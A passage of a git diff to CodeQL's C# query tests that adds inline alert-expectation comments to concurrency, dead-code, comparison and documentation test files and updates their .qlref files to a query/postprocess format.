f_nonvirtual; // GOOD } diff --git a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref index 22b4b9fc49c7..b7e586c7dac9 100644 --- a/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref +++ b/csharp/ql/test/query-tests/Bad Practices/VirtualCallInConstructorOrDestructor/VirtualCallInConstructorOrDestructor.qlref @@ -1 +1,2 @@ -Bad Practices/VirtualCallInConstructorOrDestructor.ql \ No newline at end of file +query: Bad Practices/VirtualCallInConstructorOrDestructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs index 719aaa865761..07e4a7119921 100644 --- a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs +++ b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.cs @@ -11,8 +11,8 @@ class CompareIdenticalValues : Super { public void M() { - if (this.Foo == Foo) ; - if (base.Foo == Foo) ; + if (this.Foo == Foo) ; // $ Alert + if (base.Foo == Foo) ; // $ Alert if (Foo == new CompareIdenticalValues().Foo) ; var x = "Abc"; @@ -20,45 +20,45 @@ public void M() var temp = x == x; // BAD: but flagged by cs/constant-comparison double d = double.NaN; - if (d == d) ; // !double.IsNan(d) - if (d <= d) ; // !double.IsNan(d), but unlikely to be intentional - if (d >= d) ; // !double.IsNan(d), but unlikely to be intentional - if (d != d) ; // double.IsNan(d) - if (d > d) ; // always false - if (d < d) ; // always false + if (d == d) ; // !double.IsNan(d) // $ Alert + if (d <= d) ; // !double.IsNan(d), but unlikely to be intentional // $ Alert + if (d >= d) ; // !double.IsNan(d), but unlikely to be intentional // $ Alert + if (d != d) ; // double.IsNan(d) // $ Alert + if (d > d) ; // always false // $ Alert + if (d < d) ; // always false // $ Alert float f = float.NaN; - if (f == f) ; // !float.IsNan(f) - if (f <= f) ; // !float.IsNan(f), but unlikely to be intentional - if (f >= f) ; // !float.IsNan(f), but unlikely to be intentional - if (f != f) ; // float.IsNan(f) - if (f > f) ; // always false - if (f < f) ; // always false + if (f == f) ; // !float.IsNan(f) // $ Alert + if (f <= f) ; // !float.IsNan(f), but unlikely to be intentional // $ Alert + if (f >= f) ; // !float.IsNan(f), but unlikely to be intentional // $ Alert + if (f != f) ; // float.IsNan(f) // $ Alert + if (f > f) ; // always false // $ Alert + if (f < f) ; // always false // $ Alert int i = 0; if (i == i) ; // BAD: but flagged by cs/constant-condition if (i != i) ; // BAD: but flagged by cs/constant-condition CompareIdenticalValues c = null; - c.Prop.Equals(c.Prop); - Equals(c.Prop.Prop.Prop.Foo + 2, c.Prop.Prop.Prop.Foo + 2); + c.Prop.Equals(c.Prop); // $ Alert + Equals(c.Prop.Prop.Prop.Foo + 2, c.Prop.Prop.Prop.Foo + 2); // $ Alert Equals(c.Prop.Prop.Prop.Foo, c.Prop.Prop.Foo); if (base.Bar == Bar) ; - if (Bar == this.Bar) ; - Equals(this); + if (Bar == this.Bar) ; // $ Alert + Equals(this); // $ Alert if (1 + 1 == 2) ; // BAD: but flagged by cs/constant-condition if (1 + 1 == 3) ; if (0 == 1) ; var a = new int[0]; - if (a[0] == a[0]) ; + if (a[0] == a[0]) ; // $ Alert - if (this.Bar[0] == Bar[1 - 1]) ; + if (this.Bar[0] == Bar[1 - 1]) ; // $ Alert if (this.Bar[0] == Bar[1]) ; - if (this.Prop[Foo] == Prop[this.Foo]) ; + if (this.Prop[Foo] == Prop[this.Foo]) ; // $ Alert if (this.Prop[0] == Prop[1]) ; } @@ -73,17 +73,17 @@ public void IsBoxed(T x) where T : I public void IsBoxedWrong1(T x) where T : struct { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public void IsBoxedWrong2(T x) where T : class { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public void IsBoxedWrong3(T x) where T : Super { - ReferenceEquals(x, x); + ReferenceEquals(x, x); // $ Alert } public int this[int i] { get { return 0; } } diff --git a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref index 9df8726c3122..cbe82efdbb0e 100644 --- a/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref +++ b/csharp/ql/test/query-tests/CSI/CompareIdenticalValues/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -CSI/CompareIdenticalValues.ql \ No newline at end of file +query: CSI/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs index b0fd29e17fa9..3bb2733dee0a 100644 --- a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs +++ b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.cs @@ -10,12 +10,12 @@ void f(Object o2) void test() { - lock (o) + lock (o) // $ Alert { o = new Foo(); // BAD } - lock (o) + lock (o) // $ Alert { f(o = null); // BAD } @@ -25,7 +25,7 @@ void test() o = new Foo(); // GOOD } - lock (o2) + lock (o2) // $ Alert { GetNewObject(out o2); // BAD } diff --git a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref index f3967efa87b8..74b0da761fbf 100644 --- a/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref +++ b/csharp/ql/test/query-tests/Concurrency/FutileSyncOnField/FutileSyncOnField.qlref @@ -1 +1,2 @@ -Concurrency/FutileSyncOnField.ql \ No newline at end of file +query: Concurrency/FutileSyncOnField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs index d2634c3e793b..69f1b89c657e 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.cs @@ -3,7 +3,7 @@ class LocalTest { // BAD: b is flagged. - Object a, b, c; + Object a, b, c; // $ Alert void F() { @@ -24,7 +24,7 @@ void H() class GlobalTest { // BAD: b is flagged. - static Object a, b, c; + static Object a, b, c; // $ Alert void F() { @@ -51,7 +51,7 @@ void I() class LambdaTest { // BAD: a is flagged. - static Object a, b; + static Object a, b; // $ Alert void F() { diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref index ee922bdeb80a..7404f9bf0183 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrder.qlref @@ -1 +1,2 @@ -Concurrency/LockOrder.ql \ No newline at end of file +query: Concurrency/LockOrder.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs index a9dd05ac8663..f2c3b18f1b44 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockOrder/LockOrderBad.cs @@ -3,7 +3,7 @@ class Deadlock { - private readonly Object lock1 = new Object(); + private readonly Object lock1 = new Object(); // $ Alert private readonly Object lock2 = new Object(); public void thread1() diff --git a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs index f1bc631ced95..cb1057c519b9 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.cs @@ -6,7 +6,7 @@ class Program void f() { - lock (this) // Not OK + lock (this) // Not OK // $ Alert { } diff --git a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref index 1cdf31326db7..7eb86f638bd3 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockThis/LockThis.qlref @@ -1 +1,2 @@ -Concurrency/LockThis.ql \ No newline at end of file +query: Concurrency/LockThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs index 8fbee2d035af..61b2b56219ab 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs +++ b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.cs @@ -22,14 +22,14 @@ static void Main() lock (lock1) { - System.Threading.Monitor.Wait(lock2); // BAD + System.Threading.Monitor.Wait(lock2); // BAD // $ Alert } lock (lock1) { lock (lock2) { - System.Threading.Monitor.Wait(lock2); // BAD + System.Threading.Monitor.Wait(lock2); // BAD // $ Alert } } @@ -37,7 +37,7 @@ static void Main() { lock (lock2) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } } } @@ -45,13 +45,13 @@ static void Main() [MethodImpl(MethodImplOptions.Synchronized)] void Lock2() { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert System.Threading.Monitor.Wait(this); // GOOD - System.Threading.Monitor.Wait(typeof(Program)); // BAD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(typeof(Program)); // BAD // $ Alert + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert lock (lock1) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } } @@ -60,28 +60,28 @@ static void Lock3() { lock (lock1) { - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert System.Threading.Monitor.Wait(typeof(Program)); // GOOD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert } void Lock4() { lock (this) { - System.Threading.Monitor.Wait(typeof(Program)); // BAD + System.Threading.Monitor.Wait(typeof(Program)); // BAD // $ Alert System.Threading.Monitor.Wait(this); // GOOD - System.Threading.Monitor.Wait(lock1); // BAD + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert } lock (typeof(Program)) { System.Threading.Monitor.Wait(typeof(Program)); // GOOD - System.Threading.Monitor.Wait(this); // BAD - System.Threading.Monitor.Wait(lock1); // BAD - System.Threading.Monitor.Wait(typeof(Int32)); // BAD + System.Threading.Monitor.Wait(this); // BAD // $ Alert + System.Threading.Monitor.Wait(lock1); // BAD // $ Alert + System.Threading.Monitor.Wait(typeof(Int32)); // BAD // $ Alert } } } diff --git a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref index 559d900bb6cd..64c4021f0d81 100644 --- a/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref +++ b/csharp/ql/test/query-tests/Concurrency/LockedWait/LockedWait.qlref @@ -1 +1,2 @@ -Concurrency/LockedWait.ql \ No newline at end of file +query: Concurrency/LockedWait.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs index 8b41604a9e67..288783fabae0 100644 --- a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs +++ b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.cs @@ -6,7 +6,7 @@ class C1 object mutex = new Object(); // BAD: getter is unlocked - int BadProperty1 + int BadProperty1 // $ Alert { get { @@ -20,7 +20,7 @@ int BadProperty1 } // BAD: getter is not properly locked - int BadProperty2 + int BadProperty2 // $ Alert { get { diff --git a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref index e1b6f28159c6..4604a0daa6c2 100644 --- a/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref +++ b/csharp/ql/test/query-tests/Concurrency/SynchSetUnsynchGet/SynchSetUnsynchGet.qlref @@ -1 +1,2 @@ -Concurrency/SynchSetUnsynchGet.ql \ No newline at end of file +query: Concurrency/SynchSetUnsynchGet.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs index cd83b18e65c4..6a292c83ae5b 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs +++ b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.cs @@ -23,13 +23,13 @@ void Fn() obj1 = null; } } - } + } // $ Alert // BAD if (obj1 == null) lock (mutex) if (obj1 == null) - obj1 = null; + obj1 = null; // $ Alert // GOOD: A value-type if (cond1) @@ -84,7 +84,7 @@ void Fn() if (null == obj1) obj1 = null; } - } + } // $ Alert // GOOD: not a field object a = null; @@ -103,7 +103,7 @@ void Fn() obj1 = null; } } - } + } // $ Alert // BAD: both obj1 and obj3 are flagged. if (obj1 == null && obj3 == null) @@ -116,7 +116,7 @@ void Fn() obj3 = null; } } - } + } // $ Alert // GOOD: Locking a struct if (struct1 == struct2) @@ -134,7 +134,7 @@ void Fn() if (struct1.x is null) lock (mutex) if(struct1.x is null) - struct1.x = 3; + struct1.x = 3; // $ Alert // GOOD: Tuples are structs so cannot be volatile. if(pair1 == (1,2)) diff --git a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref index 084b5abcc176..a78173ad9fb8 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref +++ b/csharp/ql/test/query-tests/Concurrency/UnsafeLazyInitialization/UnsafeLazyInitialization.qlref @@ -1 +1,2 @@ -Concurrency/UnsafeLazyInitialization.ql \ No newline at end of file +query: Concurrency/UnsafeLazyInitialization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs index c78ca515b518..eef9339a23fe 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs +++ b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.cs @@ -20,7 +20,7 @@ public static void aWriter() public void test() { // BAD: unsynchronized access - string val = dict["foo"]; + string val = dict["foo"]; // $ Alert lock (mutex) { @@ -66,6 +66,6 @@ private void testLocked() private void testMethod() { // BAD: called concurrently by thread - string val = dict["foo"]; + string val = dict["foo"]; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref index 59d6716994fd..2fceef745285 100644 --- a/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref +++ b/csharp/ql/test/query-tests/Concurrency/UnsynchronizedStaticAccess/UnsynchronizedStaticAccess.qlref @@ -1 +1,2 @@ -Concurrency/UnsynchronizedStaticAccess.ql \ No newline at end of file +query: Concurrency/UnsynchronizedStaticAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref index 9dae41964f3f..94937ccf811b 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/EmptyPasswordInConfigurationFile.qlref @@ -1 +1 @@ -Configuration/EmptyPasswordInConfigurationFile.ql +query: Configuration/EmptyPasswordInConfigurationFile.ql diff --git a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref index b440a1f6909b..0479b5098f3d 100644 --- a/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref +++ b/csharp/ql/test/query-tests/Configuration/PasswordInConfigurationFile/PasswordInConfigurationFile.qlref @@ -1 +1 @@ -Configuration/PasswordInConfigurationFile.ql +query: Configuration/PasswordInConfigurationFile.ql diff --git a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs index f7f18a187da2..00f79bc89d74 100644 --- a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs +++ b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.cs @@ -84,8 +84,8 @@ struct PtrToStructure2 class Fields1 { // BAD: - int BadNonAssigned; - object BadAssignedNull = null; + int BadNonAssigned; // $ Alert + object BadAssignedNull = null; // $ Alert // GOOD: int GoodAssignedByInitializer = 0; diff --git a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref index 39148492539f..c2632de3dd2e 100644 --- a/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref +++ b/csharp/ql/test/query-tests/Dead Code/NonAssignedFields/NonAssignedFields.qlref @@ -1 +1,2 @@ -Dead Code/NonAssignedFields.ql \ No newline at end of file +query: Dead Code/NonAssignedFields.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref index 56db2195eb87..e8ba93a5e7fc 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/DeadRefTypes.qlref @@ -1 +1,2 @@ -Dead Code/DeadRefTypes.ql \ No newline at end of file +query: Dead Code/DeadRefTypes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref index 8464f79cd9bc..3803f9ec7bad 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedField.qlref @@ -1 +1,2 @@ -Dead Code/UnusedField.ql +query: Dead Code/UnusedField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref index efc3937de8c0..9edba82f5dbf 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref +++ b/csharp/ql/test/query-tests/Dead Code/Tests/UnusedMethod.qlref @@ -1 +1,2 @@ -Dead Code/UnusedMethod.ql +query: Dead Code/UnusedMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs b/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs index d6905a6100fd..486e811ee02c 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs +++ b/csharp/ql/test/query-tests/Dead Code/Tests/deadcode.cs @@ -21,7 +21,7 @@ sealed class Exported : Interface1 } // BAD: Class is dead -sealed class Dead2 +sealed class Dead2 // $ Alert[cs/unused-reftype] { } @@ -82,7 +82,7 @@ static int Main(string[] args) public struct S { - C Field; // dead + C Field; // dead // $ Alert[cs/unused-field] class C { } // not dead } diff --git a/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs b/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs index 3f6a4a2937b4..bc4a3d6ce893 100644 --- a/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs +++ b/csharp/ql/test/query-tests/Dead Code/Tests/regression.cs @@ -4,7 +4,7 @@ class Test : IComparer { // this is really dead - private string dead = "Actual dead field"; + private string dead = "Actual dead field"; // $ Alert[cs/unused-field] private static void Main(string[] args) { @@ -48,7 +48,7 @@ private static int PartCompare(string a, string b) } // this is really dead - private void ActualDeadMethod() { } + private void ActualDeadMethod() { } // $ Alert[cs/unused-method] // this is live private void DynamicSig(dynamic d) { } @@ -57,7 +57,7 @@ private void DynamicSig(dynamic d) { } private void DynamicallyCalled(int i) { } // this is dead - private void NotDynamicallyCalled(int i) { } + private void NotDynamicallyCalled(int i) { } // $ Alert[cs/unused-method] // this is live private void DynamicallyCalledOnDynamicType(int i) { } @@ -74,14 +74,14 @@ public static int GenericTest() static int liveFieldAccessedFromGeneric; // BAD: This is dead - void DeadCaller() + void DeadCaller() // $ Alert[cs/unused-method] { DeadGeneric(0); DeadGeneric(0.0); } // BAD: This is dead (called from dead) - void DeadGeneric(V a) { } + void DeadGeneric(V a) { } // $ Alert[cs/unused-method] } class GenericClass @@ -102,18 +102,18 @@ int LiveGeneric(V v) int liveField; // BAD: These are not live - void DeadGeneric1() + void DeadGeneric1() // $ Alert[cs/unused-method] { DeadGeneric2(0); DeadGeneric2(1.0); } - void DeadGeneric2(V v) { } + void DeadGeneric2(V v) { } // $ Alert[cs/unused-method] // BAD: This is dead (never accessed) - int deadField; + int deadField; // $ Alert[cs/unused-field] // BAD: This is dead (only ever written) - int deadWrittenField; + int deadWrittenField; // $ Alert[cs/unused-field] } class MemberInitialization @@ -126,7 +126,7 @@ class ThisIsLive : ITest { } public class FieldOutParam { // BAD: Only written (by an out param) - int deadField; + int deadField; // $ Alert[cs/unused-field] public void Test() { diff --git a/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref index fd8371466b6f..8439ce413ec1 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocExtraParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocExtraParam.ql +query: Documentation/XmldocExtraParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref index bc8515e6675c..67de8cb4600e 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocExtraTypeParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocExtraTypeParam.ql \ No newline at end of file +query: Documentation/XmldocExtraTypeParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref index 281a5cb07029..6ca5136a2e38 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissing.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissing.ql \ No newline at end of file +query: Documentation/XmldocMissing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref index ec059908e38c..4cd247832588 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingException.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingException.ql +query: Documentation/XmldocMissingException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref index 9a8d6f801b7b..9b34d284c01d 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingParam.ql +query: Documentation/XmldocMissingParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref index 6eb8865b4b5d..ad0ea9697424 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingReturn.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingReturn.ql +query: Documentation/XmldocMissingReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref index 5046e31a3db4..b90b6e39ce7f 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingSummary.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingSummary.ql +query: Documentation/XmldocMissingSummary.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref index f06bbb263d02..7090a1612d89 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingTypeParam.ql +query: Documentation/XmldocMissingTypeParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/documentation.cs b/csharp/ql/test/query-tests/Documentation/documentation.cs index 810e9b5a34af..1efeeb8d4599 100644 --- a/csharp/ql/test/query-tests/Documentation/documentation.cs +++ b/csharp/ql/test/query-tests/Documentation/documentation.cs @@ -30,13 +30,13 @@ public virtual int method1(int p1, int p2) /// BAD: This XML comment is missing several tags /// BAD: This parameter does not exist /// BAD: This should say Exception2 - public int method2(int p1, int p2) + public int method2(int p1, int p2) // $ Alert[cs/xmldoc/missing-exception] Alert[cs/xmldoc/missing-parameter] Alert[cs/xmldoc/missing-return] Alert[cs/xmldoc/missing-summary] Alert[cs/xmldoc/unknown-parameter] { return p1 > 0 ? throw new Exception2() : p2; } // BAD: Missing documentation comment - public int method3() + public int method3() // $ Alert[cs/xmldoc/missing-xmldoc] { return 0; } @@ -48,7 +48,7 @@ internal int method4() } // BAD: Public class is not documented - public class Class2 + public class Class2 // $ Alert[cs/xmldoc/missing-xmldoc] { } @@ -71,7 +71,7 @@ public Class1(int p) } // BAD: Constructor is public and not documented - public Class1(int a, int b) + public Class1(int a, int b) // $ Alert[cs/xmldoc/missing-xmldoc] { } @@ -80,7 +80,7 @@ public Class1(int a, int b) /// BAD: Contains an extra typeparam /// /// The type - class Class4 { } + class Class4 { } // $ Alert[cs/xmldoc/missing-type-parameter] Alert[cs/xmldoc/unknown-type-parameter] ///

